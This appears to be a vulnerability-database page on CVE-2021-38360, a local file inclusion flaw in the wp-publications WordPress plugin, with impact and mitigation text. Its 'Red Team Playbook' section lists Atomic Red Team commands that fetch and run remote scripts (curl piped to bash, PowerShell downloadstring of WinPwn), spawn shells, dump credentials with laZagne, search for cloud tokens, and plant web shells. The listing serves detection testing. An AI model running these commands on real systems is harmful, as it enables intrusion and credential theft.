CVE-2021-38360
Overview
The vulnerability is a restrictive local file inclusion (LFI) flaw rooted in insufficient validation of the Q_FILE parameter within the wp-publications WordPress plugin. The affected component is the bibtexbrowser.php script, which processes this parameter to include local files without properly restricting file types or paths. This improper input sanitization allows attackers to manipulate file inclusion logic, enabling access to unintended local resources.
Vulnerability Description
The wp-publications WordPress plugin is vulnerable to restrictive local file inclusion via the Q_FILE parameter found in the ~/bibtexbrowser.php file which allows attackers to include local zip files and achieve remote code execution, in versions up to and including 0.0.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code on the hosting server by supplying crafted input to the Q_FILE parameter. No user interaction or privileges are required, and the attack can be performed over the network. Successful exploitation may result in full system compromise, data exposure, or service disruption. The CVSS vector indicates network attack vector, low attack complexity, no privileges, no user interaction, and scope change with partial confidentiality, integrity, and availability impact.
Solution
Users of the wp-publications WordPress plugin should update to a patched version once released, as detailed in the Wordfence advisory at https://www.wordfence.com/vulnerability-advisories/#CVE-2021-38360. Until an official patch is available, administrators should restrict access to bibtexbrowser.php and disable or remove the plugin if not essential. Monitoring the plugin's official repository and WordPress plugin directory for updates is recommended to apply vendor-provided fixes promptly.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the wp-publications WordPress plugin arises from a flaw in the handling of the Q_FILE parameter within the bibtexbrowser.php file. This issue allows for restrictive local file inclusion, which means that an attacker can manipulate the input to include files from the server's local file system. Specifically, the vulnerability permits the inclusion of local zip files, which can be exploited to execute arbitrary code on the server. The lack of proper input validation and sanitization is the root cause of this critical security flaw, enabling attackers to bypass intended restrictions and gain unauthorized access to sensitive system resources.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious request to the bibtexbrowser.php file, supplying a specially constructed Q_FILE parameter that points to a local zip file containing malicious scripts or payloads. Once the server processes this request, the attacker can leverage the executed code to gain control over the server environment. This could lead to further attacks, such as data exfiltration, website defacement, or the deployment of additional malware. The ease of exploitation, combined with the high severity of the vulnerability, makes it a prime target for cybercriminals seeking to compromise WordPress installations.
The real-world impact of this vulnerability is significant, particularly for organizations relying on the wp-publications plugin for managing bibliographic data. A successful exploitation could lead to severe business risks, including data breaches, loss of customer trust, and potential legal ramifications due to non-compliance with data protection regulations. Additionally, the compromised server could be used as a launchpad for further attacks against other connected systems, amplifying the overall risk to the organization. The high CVSS score of 9.8 underscores the urgency for affected users to address this vulnerability promptly to mitigate potential damage.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. Regular security assessments, including vulnerability scanning and penetration testing, can help identify instances of the wp-publications plugin in use and assess their security posture. Additionally, maintaining an updated inventory of all plugins and ensuring that they are regularly patched is crucial. Organizations should also consider employing web application firewalls (WAFs) to filter and monitor HTTP requests for malicious payloads. Furthermore, implementing strict access controls and monitoring server logs can help detect any unauthorized access attempts or anomalous behavior indicative of exploitation.
In conclusion, the vulnerability present in the wp-publications WordPress plugin represents a critical security risk that can lead to severe consequences if left unaddressed. The combination of easy exploitation and potential for significant impact necessitates immediate action from organizations using this plugin. By adopting proactive detection and mitigation strategies, businesses can safeguard their systems against the threats posed by this vulnerability and enhance their overall security posture in the face of evolving cyber threats.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Wp-Publications Project | Wp-Publications | N/A |
cpe:2.3:a:wp-publications_project:wp-publications:-:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-38360 |
| wordfence.com |
GitHub CVE
x_refsource_MISC
|
https://www.wordfence.com/vulnerability-advisories/#CVE-2021-38360 |
| plugins.trac.wordpress.org |
GitHub CVE
x_refsource_MISC
|
https://plugins.trac.wordpress.org/browser/wp-publications/trunk/bibtexbrowser.php?rev=1830330#L49 |